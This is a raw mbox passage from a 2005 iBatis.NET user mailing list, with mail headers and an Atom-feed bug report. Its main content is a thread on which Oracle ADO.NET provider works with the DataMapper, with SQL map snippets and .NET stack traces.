[161.129.204.104]) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.9) with ESMTP id jB1KUUB3028678 for <[email protected]>; Thu, 1 Dec 2005 12:30:30 -0800 (PST) Received: (from root@localhost) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.8/Submit) id jB1KUUOt028660 for [email protected]; Thu, 1 Dec 2005 12:30:30 -0800 (PST) Received: from CPREXN100.itdmis02.futureshop.com (cprexn100 [161.129.204.104]) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.9) with ESMTP id jB1JZGBf021877 for <[email protected]>; Thu, 1 Dec 2005 11:36:44 -0800 (PST) Received: from CPREXN020-EVS.itdmis02.futureshop.com ([161.129.204.104]) by CPREXN100.itdmis02.futureshop.com with Microsoft SMTPSVC(6.0.3790.211); Thu, 1 Dec 2005 11:43:52 -0800 X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C5F6AF.8E065C4E" Subject: mail-archives atom feed for user-cs is consistently generating invalid xml Date: Thu, 1 Dec 2005 11:43:55 -0800 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: mail-archives atom feed for user-cs is consistently generating invalid xml Thread-Index: AcX2r5Blo4rkt0IFSjiP3cgbUwA1lQ== From: "Jeremy Gray" <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 01 Dec 2005 19:43:52.0096 (UTC) FILETIME=[8E88B200:01C5F6AF] X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multi-part message in MIME format. ------_=_NextPart_001_01C5F6AF.8E065C4E Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable I'm not sure if this is the correct venue, but thought I should send the list a quick message to let its operators know that the atom feed* for the archives has been consistently producing invalid xml for at least the last week. =20 * http://mail-archives.apache.org/mod_mbox/ibatis-user-cs/?format=3Datom =20 Jeremy Gray Development Lead, SIMM Services siberra DIGITAL MEDIA SYSTEMS Tel: 2512494468 [email protected] <mailto:[email protected]>=20 www.siberra.com <http://www.siberra.com/> =20 =20 ------_=_NextPart_001_01C5F6AF.8E065C4E Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:o=3D"urn:schemas-microsoft-com:office:office" = xmlns:w=3D"urn:schemas-microsoft-com:office:word" = xmlns=3D"http://www.w3.org/TR/REC-html40"> <head> <meta http-equiv=3DContent-Type content=3D"text/html; = charset=3Dus-ascii"> <meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)"> <style> <!-- /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0in; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Times New Roman";} a:link, span.MsoHyperlink {color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline;} span.EmailStyle17 {mso-style-type:personal-compose; font-family:Arial; color:windowtext;} @page Section1 {size:8.5in 11.0in; margin:1.0in 1.25in 1.0in 1.25in;} div.Section1 {page:Section1;} --> </style> </head> <body lang=3DEN-US link=3Dblue vlink=3Dpurple> <div class=3DSection1> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>I&#8217;m not sure if this is the correct venue, but = thought I should send the list a quick message to let its operators know that = the atom feed* for the archives has been consistently producing invalid xml for = at least the last week.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>* <a href=3D"http://mail-archives.apache.org/mod_mbox/ibatis-user-cs/?format=3D= atom">http://mail-archives.apache.org/mod_mbox/ibatis-user-cs/?format=3Da= tom</a><o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><strong><b><font size=3D2 color=3Dblack = face=3DArial><span style=3D'font-size:10.0pt;font-family:Arial;color:black'>Jeremy = Gray</span></font></b></strong><font size=3D2 color=3Dblack face=3DArial><span = style=3D'font-size:10.0pt;font-family:Arial; color:black'><br> <em><i><font face=3DArial><span style=3D'font-family:Arial'>Development = Lead, SIMM Services</span></font></i></em><br> </span></font><strong><b><font size=3D4 color=3Dmaroon = face=3DArial><span style=3D'font-size:13.5pt;font-family:Arial;color:maroon'>siberra</span><= /font></b></strong><font size=3D2 color=3Dblack face=3DArial><span = style=3D'font-size:10.0pt;font-family:Arial; color:black'><br> </span></font><font size=3D1 color=3D"#aa8515" face=3DArial><span = style=3D'font-size: 7.5pt;font-family:Arial;color:#AA8515'>DIGITAL MEDIA = SYSTEMS</span></font><font size=3D2 color=3Dblack face=3DArial><span = style=3D'font-size:10.0pt;font-family:Arial; color:black'><br> Tel:&nbsp;&nbsp;2512494468<br> <a href=3D"mailto:[email protected]"><font size=3D3 color=3Dblack face=3D"Times New Roman"><span = style=3D'font-size:12.0pt;font-family:"Times New Roman"; color:black'>[email protected]</span></font></a><br> <a href=3D"http://www.siberra.com/"><font size=3D3 color=3Dblack face=3D"Times New Roman"><span = style=3D'font-size:12.0pt;font-family:"Times New Roman"; color:black'>www.siberra.com</span></font></a> </span></font><font = size=3D2 color=3Dblack face=3DArial><span = style=3D'font-size:10.0pt;font-family:Arial; color:black'><o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'><o:p>&nbsp;</o:p></span></font></p> </div> </body> </html> ------_=_NextPart_001_01C5F6AF.8E065C4E-- From [email protected] Fri Dec 02 11:02:26 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70471 invoked from network); 2 Dec 2005 11:02:26 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Dec 2005 11:02:26 -0000 Received: (qmail 87495 invoked by uid 500); 2 Dec 2005 11:02:26 -0000 Delivered-To: [email protected] Received: (qmail 87484 invoked by uid 500); 2 Dec 2005 11:02:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87473 invoked by uid 99); 2 Dec 2005 11:02:24 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Dec 2005 03:02:24 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail.sbs-softwaresysteme.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Dec 2005 03:03:52 -0800 Received: (qmail 1014 invoked from network); 2 Dec 2005 12:01:58 +0100 Received: by simscan 1.1.0 ppid: 29435, pid: 10498, t: 3.3540s scanners: clamav: 0.87/m:34/d:1200 spam: 3.0.4 Received: from unknown (HELO sbs-softwaresysteme.de) (161.129.204.104) by mail.sbs-softwaresysteme.de with SMTP; 2 Dec 2005 12:01:55 +0100 Message-ID: <[email protected]> Date: Fri, 02 Dec 2005 12:01:53 +0100 From: Uwe Lesta <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax) X-Accept-Language: de-de, de, en-gb, en-us MIME-Version: 1.0 To: [email protected] Subject: Re: Oracle provider with iBatis dataMapper 1.2 References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Spam-Checker-Version: SpamAssassin 3.0.4 (2005-06-05) on mail.sbs-softwaresysteme.de X-Spam-Level: X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No, score=-0.4 required=4.9 tests=AWL,BAYES_00, RCVD_IN_NJABL_DUL,RCVD_IN_SORBS_DUL autolearn=no version=3.0.4 X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Befor i dig into some solution i like to ask my question with other words: Which Oracle provider is best tested and is advised by the iBatis comunety ? Jeremy Gray wrote: > Can you provide any details regarding the exceptions you are seeing? We sure my test query is : <select id="SelectFilter" parameterClass="MMServer.DAL.USERSDB_Filter" resultMap="USERSSelectResult" > SELECT ID, LOGIN, FIRSTNAME, LASTNAME, ROLE_ID, ORG_ID, REMARK, EXPIRES, MODIFIED, DISABLED, ACTIVE FROM USERS <dynamic prepend="WHERE"> <isNotNull prepend="AND" property="LOGIN"> LOGIN like #LOGIN# </isNotNull> <isGreaterThan prepend="AND" property="ACTIVE" compareValue="-1"> ACTIVE = #ACTIVE# </isGreaterThan> </dynamic> </select> with <add key="provider" value="oracle10.1" /> i get [OracleTypeException: Numerische Stellenangabe liegt außerhalb des gültigen Bereiches (1 - 38)] Oracle.DataAccess.Types.OracleDecimal.ConvertToPrecScale(OracleDecimal value1, Int32 precision, Int32 scale) +667 Oracle.DataAccess.Client.OracleParameter.PreBind_Decimal() +3956 Oracle.DataAccess.Client.OracleParameter.PreBind(OracleConnection conn, IntPtr errCtx, Int32 arraySize) +132 Oracle.DataAccess.Client.OracleCommand.ExecuteReader(Boolean requery, Boolean fillRequest, CommandBehavior behavior) +2349 Oracle.DataAccess.Client.OracleCommand.ExecuteReader(Boolean requery, Boolean fillRequest, CommandBehavior behavior) +0 Oracle.DataAccess.Client.OracleCommand.System.Data.IDbCommand.ExecuteReader() +81 Oracle.DataAccess.Client.OracleCommand.System.Data.IDbCommand.ExecuteReader() +0 IBatisNet.DataMapper.MappedStatements.MappedStatement.RunQueryForList(RequestScope request, IDalSession session, Object parameterObject, Int32 skipResults, Int32 maxResults, RowDelegate rowDelegate) IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList(IDalSession session, Object parameterObject, Int32 skipResults, Int32 maxResults) IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList(IDalSession session, Object parameterObject) IBatisNet.DataMapper.SqlMapper.QueryForList(String statementName, Object parameterObject) MMServer.DAL.USERSDB.SelectFilter(USERSDB_Filter filter) in e:\projekteweb\lft\medienmanager\mmserver\app_code\dal\man\usersdb.cs:103 MMServer.Pages.ifPlayListen.Page_Load(Object sender, EventArgs e) in e:\projekteweb\lft\medienmanager\mmserver\app_code\pages\playlisten\ifplaylisten.aspx.cs:41 with <add key="provider" value="oracleClient1.0" /> i get [Exception: Parameter 'param0': No size set for variable length data type: String.] System.Data.OracleClient.OracleParameterBinding.PrepareForBind(OracleConnection connection, Int32& offset) +720 System.Data.OracleClient.OracleCommand.Execute(OciHandle statementHandle, CommandBehavior behavior, Boolean isReader, Boolean needRowid, OciHandle& rowidDescriptor, ArrayList& refCursorParameterOrdinals) +1919 System.Data.OracleClient.OracleCommand.Execute(OciHandle statementHandle, CommandBehavior behavior, ArrayList& refCursorParameterOrdinals) +28 System.Data.OracleClient.OracleCommand.ExecuteReader(CommandBehavior behavior) +272 System.Data.OracleClient.OracleCommand.ExecuteReader() +7 System.Data.OracleClient.OracleCommand.System.Data.IDbCommand.ExecuteReader() +5 IBatisNet.DataMapper.MappedStatements.MappedStatement.RunQueryForList(RequestScope request, IDalSession session, Object parameterObject, Int32 skipResults, Int32 maxResults, RowDelegate rowDelegate) IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList(IDalSession session, Object parameterObject, Int32 skipResults, Int32 maxResults) IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList(IDalSession session, Object parameterObject) IBatisNet.DataMapper.SqlMapper.QueryForList(String statementName, Object parameterObject) MMServer.DAL.USERSDB.SelectFilter(USERSDB_Filter filter) in e:\projekteweb\lft\medienmanager\mmserver\app_code\dal\man\usersdb.cs:103 MMServer.Pages.ifPlayListen.Page_Load(Object sender, EventArgs e) in e:\projekteweb\lft\medienmanager\mmserver\app_code\pages\playlisten\ifplaylisten.aspx.cs:43 If i change the condition to <isNotEqual prepend="AND" property="LOGIN" compareValue=""> LOGIN like #LOGIN# </isNotEqual> i get [DataMapperException: Error comparing in conditional fragment. Uknown 'compare to' values.] IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.ConditionalTagHandler.Compare(SqlTagContext ctx, SqlTag sqlTag, Object parameterObject) IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.IsEqualTagHandler.IsCondition(SqlTagContext ctx, SqlTag tag, Object parameterObject) IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.IsNotEqualTagHandler.IsCondition(SqlTagContext ctx, SqlTag tag, Object parameterObject) IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.ConditionalTagHandler.DoStartFragment(SqlTagContext ctx, SqlTag tag, Object parameterObject) IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.ProcessBodyChildren(RequestScope request, SqlTagContext ctx, Object parameterObject, IEnumerator localChildren, StringBuilder buffer) IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.ProcessBodyChildren(RequestScope request, SqlTagContext ctx, Object parameterObject, IEnumerator localChildren, StringBuilder buffer) IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.ProcessBodyChildren(RequestScope request, SqlTagContext ctx, Object parameterObject, IList localChildren) IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.Process(RequestScope request, Object parameterObject) IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.GetRequestScope(Object parameterObject, IDalSession session) IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList(IDalSession session, Object parameterObject, Int32 skipResults, Int32 maxResults) IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForList(IDalSession session, Object parameterObject) IBatisNet.DataMapper.SqlMapper.QueryForList(String statementName, Object parameterObject) MMServer.DAL.USERSDB.SelectFilter(USERSDB_Filter filter) in e:\projekteweb\lft\medienmanager\mmserver\app_code\dal\man\usersdb.cs:103 MMServer.Pages.ifPlayListen.Page_Load(Object sender, EventArgs e) in e:\projekteweb\lft\medienmanager\mmserver\app_code\pages\playlisten\ifplaylisten.aspx.cs:43 > too encountered some early on, specifically with respect to default type > conversion of certain sizes of oracle number fields, and might be able > to point you in the right direction. > > Jeremy Gray <snip> > I like to ask: > > Which seems to be the best Oracle provider to work with the ibatis > DataMapper 1.2 ( latest SVN version ) ? > > Background: I get different TypeExceptions on different columntypes on > different providers. -- Kind regards Uwe [email protected] From [email protected] Sat Dec 03 00:00:15 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13023 invoked from network); 3 Dec 2005 00:00:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Dec 2005 00:00:14 -0000 Received: (qmail 91979 invoked by uid 500); 2 Dec 2005 23:58:26 -0000 Delivered-To: [email protected] Received: (qmail 91485 invoked by uid 500); 2 Dec 2005 23:58:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91261 invoked by uid 99); 2 Dec 2005 23:58:22 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Dec 2005 15:58:22 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Dec 2005 10:38:40 -0800 Received: by wproxy.gmail.com with SMTP id 50so148183wri for <[email protected]>; Fri, 02 Dec 2005 10:36:50 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=Y5kpaK1+rsTtrtBycVm6dv5E34kSxQCcmiDK9z0Po+b8q1qG4iwlaa8c3Rec/a03yQT0b7YGcxKooNehaA/hSt/dhxdRB4JqOK6NbLBZpI8CmAaOfp/1J5nRvZNWMTJ5LJYLgXcnCjOAWzPvCpI8sKwfIbJKZlKYfrjVYbK1OVA= Received: by 161.129.204.104 with SMTP id y7mr674566wrc; Fri, 02 Dec 2005 10:36:50 -0800 (PST) Received: by 161.129.204.104 with HTTP; Fri, 2 Dec 2005 10:36:49 -0800 (PST) Message-ID: <[email protected]> Date: Fri, 2 Dec 2005 13:36:50 -0500 From: Roberto R <[email protected]> To: [email protected] Subject: Re: Oracle provider with iBatis dataMapper 1.2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_2689_7051199.1133548610001" References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_2689_7051199.1133548610001 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline BTW, there's a Wiki page that has some info on the DB-provider combos: http://opensource2.atlassian.com/confluence/oss/pages/viewpage.action?pageI= d=3D532 On 12/2/05, Roberto R <[email protected]> wrote: > > Tests were run for System.Data.OracleClient, ODP.NET 9i, and ODP.NET 10g. > (I would not recommend using ODP.NET 9i with the DataMapper.) > > From my experience, System.Data.OracleClient was the "easiest" to use > right away, but ODP.NET 10g offers some advanced features that could be > used outside of the DataMapper. > > Roberto > > > On 12/2/05, Uwe Lesta <[email protected]> wrote: > > > > > > Befor i dig into some solution i like to ask my question with other > > words: > > > > Which Oracle provider is best tested and is advised by the iBatis > > comunety ? > > > > > > Jeremy Gray wrote: > > > > > Can you provide any details regarding the exceptions you are seeing? > > We > > > > sure > > > > my test query is : > > > > <select id=3D"SelectFilter" parameterClass=3D" > > MMServer.DAL.USERSDB_Filter" resultMap=3D"USERSSelectResult" > > > SELECT > > ID, LOGIN, FIRSTNAME, LASTNAME, ROLE_ID, ORG_ID= , > > REMARK, EXPIRES, MODIFIED, DISABLED, ACTIVE > > FROM USERS > > <dynamic prepend=3D"WHERE"> > > <isNotNull prepend=3D"AND" property=3D"LOGIN"> > > LOGIN like #LOGIN# > > </isNotNull> > > <isGreaterThan prepend=3D"AND" property=3D"ACTI= VE" > > compareValue=3D"-1"> > > ACTIVE =3D #ACTIVE# > > </isGreaterThan> > > </dynamic> > > </select> > > > > with > > <add key=3D"provider" value=3D"oracle10.1" /> > > i get > > > > [OracleTypeException: Numerische Stellenangabe liegt au=DFerhalb des > > g=FCltigen Bereiches (1 - 38)] > > Oracle.DataAccess.Types.OracleDecimal.ConvertToPrecScale(OracleDeci= mal > > value1, Int32 precision, Int32 scale) +667 > > Oracle.DataAccess.Client.OracleParameter.PreBind_Decimal() +3956 > > Oracle.DataAccess.Client.OracleParameter.PreBind(OracleConnection > > conn, IntPtr errCtx, Int32 arraySize) +132 > > Oracle.DataAccess.Client.OracleCommand.ExecuteReader (Boolean > > requery, Boolean fillRequest, CommandBehavior behavior) > > +2349 > > Oracle.DataAccess.Client.OracleCommand.ExecuteReader(Boolean > > requery, Boolean fillRequest, CommandBehavior behavior) +0 > > > > Oracle.DataAccess.Client.OracleCommand.System.Data.IDbCommand.ExecuteRe= ader() +81 > > > > Oracle.DataAccess.Client.OracleCommand.System.Data.IDbCommand.ExecuteRe= ader() > > +0 > > > > IBatisNet.DataMapper.MappedStatements.MappedStatement.RunQueryForList(R= equestScope > > request, IDalSession session, > > Object parameterObject, Int32 skipResults, Int32 maxResults, RowDelegat= e > > rowDelegate) > > > > IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForLi= st(IDalSession > > session, Object > > parameterObject, Int32 skipResults, Int32 maxResults) > > > > IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForLi= st(IDalSession session, Object parameterObject) > > IBatisNet.DataMapper.SqlMapper.QueryForList(String statementName, > > Object parameterObject) > > MMServer.DAL.USERSDB.SelectFilter(USERSDB_Filter filter) in > > e:\projekteweb\lft\medienmanager\mmserver\app_code\dal\man\usersdb.cs:1= 03 > > > > MMServer.Pages.ifPlayListen.Page_Load(Object sender, EventArgs e) i= n > > > > e:\projekteweb\lft\medienmanager\mmserver\app_code\pages\playlisten\ifp= laylisten.aspx.cs:41 > > > > > > with > > <add key=3D"provider" value=3D" oracleClient1.0" /> > > > > i get > > > > [Exception: Parameter 'param0': No size set for variable length data > > type: String.] > > System.Data.OracleClient.OracleParameterBinding.PrepareForBind(Orac= leConnection > > connection, Int32& offset) +720 > > System.Data.OracleClient.OracleCommand.Execute(OciHandle > > statementHandle, CommandBehavior behavior, Boolean > > isReader, Boolean needRowid, OciHandle& rowidDescriptor, ArrayList& > > refCursorParameterOrdinals) +1919 > > System.Data.OracleClient.OracleCommand.Execute(OciHandle > > statementHandle, CommandBehavior behavior, ArrayList& > > refCursorParameterOrdinals) +28 > > System.Data.OracleClient.OracleCommand.ExecuteReader(CommandBehavio= r > > behavior) +272 > > System.Data.OracleClient.OracleCommand.ExecuteReader() +7 > > > > System.Data.OracleClient.OracleCommand.System.Data.IDbCommand.ExecuteRe= ader() > > +5 > > > > IBatisNet.DataMapper.MappedStatements.MappedStatement.RunQueryForList(R= equestScope request, IDalSession session, > > Object parameterObject, Int32 skipResults, Int32 maxResults, RowDelegat= e > > rowDelegate) > > > > IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForLi= st(IDalSession > > session, Object > > parameterObject, Int32 skipResults, Int32 maxResults) > > > > IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForLi= st(IDalSession > > session, Object parameterObject) > > IBatisNet.DataMapper.SqlMapper.QueryForList (String statementName, > > Object parameterObject) > > MMServer.DAL.USERSDB.SelectFilter(USERSDB_Filter filter) in > > > > e:\projekteweb\lft\medienmanager\mmserver\app_code\dal\man\usersdb.cs:1= 03 > > MMServer.Pages.ifPlayListen.Page_Load (Object sender, EventArgs e) > > in > > > > e:\projekteweb\lft\medienmanager\mmserver\app_code\pages\playlisten\ifp= laylisten.aspx.cs:43 > > > > > > > > > > If i change the condition to > > > > <isNotEqual prepend=3D"AND" property=3D"LOGIN" > > compareValue=3D""> > > LOGIN like #LOGIN# > > </isNotEqual> > > > > i get > > > > [DataMapperException: Error comparing in conditional fragment. Uknown > > 'compare to' values.] > > > > IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.ConditionalTagH= andler.Compare(SqlTagContext ctx, SqlTag > > sqlTag, Object parameterObject) > > > > IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.IsEqualTagHandl= er.IsCondition(SqlTagContext > > ctx, SqlTag tag, > > Object parameterObject) > > > > IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.IsNotEqualTagHa= ndler.IsCondition(SqlTagContext ctx, SqlTag > > tag, Object parameterObject) > > > > IBatisNet.DataMapper.Configuration.Sql.Dynamic.Handlers.ConditionalTagH= andler.DoStartFragment(SqlTagContext > > ctx, > > SqlTag tag, Object parameterObject) > > > > IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.ProcessBodyCh= ildren(RequestScope > > request, SqlTagContext > > ctx, Object parameterObject, IEnumerator localChildren, StringBuilder > > buffer) > > > > IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.ProcessBodyCh= ildren(RequestScope request, SqlTagContext > > ctx, Object parameterObject, IEnumerator localChildren, StringBuilder > > buffer) > > > > IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.ProcessBodyCh= ildren(RequestScope > > request, SqlTagContext > > ctx, Object parameterObject, IList localChildren) > > IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.Process(R= equestScope > > request, Object parameterObject) > > > > IBatisNet.DataMapper.Configuration.Sql.Dynamic.DynamicSql.GetRequestSco= pe(Object parameterObject, IDalSession session) > > > > IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForLi= st(IDalSession > > session, Object > > parameterObject, Int32 skipResults, Int32 maxResults) > > > > IBatisNet.DataMapper.MappedStatements.MappedStatement.ExecuteQueryForLi= st(IDalSession session, Object parameterObject) > > IBatisNet.DataMapper.SqlMapper.QueryForList(String statementName, > > Object parameterObject) > > MMServer.DAL.USERSDB.SelectFilter(USERSDB_Filter filter) in > > e:\projekteweb\lft\medienmanager\mmserver\app_code\dal\man\usersdb.cs:1= 03 > > > > MMServer.Pages.ifPlayListen.Page_Load(Object sender, EventArgs e) i= n > > > > e:\projekteweb\lft\medienmanager\mmserver\app_code\pages\playlisten\ifp= laylisten.aspx.cs:43 > > > > > > > > > > > too encountered some early on, specifically with respect to default > > type > > > conversion of certain sizes of oracle number fields, and might be abl= e > > > to point you in the right direction. > > > > > > Jeremy Gray > > > > > > <snip> > > > > > I like to ask: > > > > > > Which seems to be the best Oracle provider to work with the ibatis > > > DataMapper 1.2 ( latest SVN version ) ? > > > > > > Background: I get different TypeExceptions on different columntypes o= n > > > different providers. > > > > -- > > > > Kind regards > > > > Uwe > > [email protected] > > > > > > > ------=_Part_2689_7051199.1133548610001 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline BTW, there's a Wiki page that has some info on the DB-provider combos:<br> <br> <a href=3D"http://opensource2.atlassian.com/confluence/oss/pages/viewpage.a= ction?pageId=3D532">http://opensource2.atlassian.com/confluence/oss/pages/v= iewpage.action?pageId=3D532</a><br> <br> &nbsp;<br><br><div><span class=3D"gmail_quote">On 12/2/05, <b class=3D"gmai= l_sendername">Roberto R</b> &lt;<a href=3D"mailto:[email protected]">r= [email protected]</a>&gt; wrote:</span><blockquote class=3D"gmail_quote= " style=3D"border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0= .8ex; padding-left: 1ex;"> Tests were run for System.Data.OracleClient, <a href=3D"http://ODP.NET" tar= get=3D"_blank" onclick=3D"return top.js.OpenExtLink(window,event,this)">ODP= .NET</a> 9i, and <a href=3D"http://ODP.NET" target=3D"_blank" onclick=3D"re= turn top.js.OpenExtLink(window,event,this)"> ODP.NET</a> 10g.&nbsp; (I would not recommend using <a href=3D"http://ODP.NET" target= =3D"_blank" onclick=3D"return top.js.OpenExtLink(window,event,this)">ODP.NE= T</a> 9i with the DataMapper.)<br> <br> >From my experience, System.Data.OracleClient was the &quot;easiest&quot; to= use right away, but <a href=3D"http://ODP.NET" target=3D"_blank" onclick=3D"ret= urn top.js.OpenExtLink(window,event,this)">ODP.NET</a> 10g offers some adva= nced features that could be used outside of the DataMapper.&nbsp; <br><span class=3D"sg"> <br> Roberto</span><div><span class=3D"e" id=3D"q_107ecc1447127abc_2"><br> <br><br><div><span class=3D"gmail_quote">On 12/2/05, <b class=3D"gmail_send= ername">Uwe Lesta</b> &lt;<a href=3D"mailto:[email protected]" t= arget=3D"_blank" onclick=3D"return top.js.OpenExtLink(window,event,this)">l= [email protected] </a>&gt; wrote:</span><blockquote class=3D"gmail_quote" style=3D"border-lef= t: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1= ex;"> <br>Befor i dig into some solution i like to ask my question with other wor= ds:<br><br>Which Oracle provider is best tested and is advised by the iBati= s comunety ?<br><br><br>Jeremy Gray wrote:<br><br>&gt; Can you provide any = details regarding the exceptions you are seeing? We <br><br>sure<br><br>my test query is :<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp= ;&nbsp;&nbsp;&nbsp;&lt;select id=3D&quot;SelectFilter&quot; parameterClass=3D&quot;MMServer.DAL.USERSDB_F= ilter&quot; resultMap=3D&quot;USERSSelectResult&quot; &gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;SELE= CT<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;= ID, LOGIN, FIRSTNAME, LASTNAME, ROLE_ID, ORG_ID, REMARK, EXPIRES, MODIFIED, DISABLED, ACTIVE<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&= nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;FROM USERS<br>&nbsp;&nbsp;&nbsp;&n= bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp= ;&lt;dynamic prepend=3D&quot;WHERE&quot;&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nb= sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;= 